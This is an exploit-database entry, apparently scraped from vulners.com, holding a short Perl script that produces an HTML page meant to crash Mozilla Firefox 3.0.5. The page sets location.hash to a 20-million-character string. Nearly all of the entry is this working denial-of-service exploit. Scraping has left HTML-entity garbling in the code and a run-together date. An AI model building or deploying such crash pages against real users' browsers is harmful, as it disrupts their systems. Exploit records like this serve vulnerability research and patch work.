Mozilla Firefox 3.0.5 location.hash Denial of Service Exploit

2009-08-2500:00:00

vulners.com

JSON

#!/usr/bin/perl

mzff_lhash_dos.pl

Mozilla Firefox 3.0.5 location.hash Denial of Service Exploit

Jeremy Brown [[email protected]/jbrownsec.blogspot.com]

Crash on Vista, play with it on XP

$filename = $ARGV[0];
if(!defined($filename))
{

 print &quot;Usage: $0 &lt;filename.html&gt;&#92;n&#92;n&quot;;

}

$head = "<html>" . "\n" . "<script type=\"text/javascript\">" . "\n";
$trig = "location.hash = \"" . "A" x 20000000 . "\";" . "\n";
$foot = "</script>" . "\n" . "</html>";

$data = $head . $trig . $foot;

 open&#40;FILE, &#39;&gt;&#39; . $filename&#41;;
 print FILE $data;
 close&#40;FILE&#41;;

exit;

JSON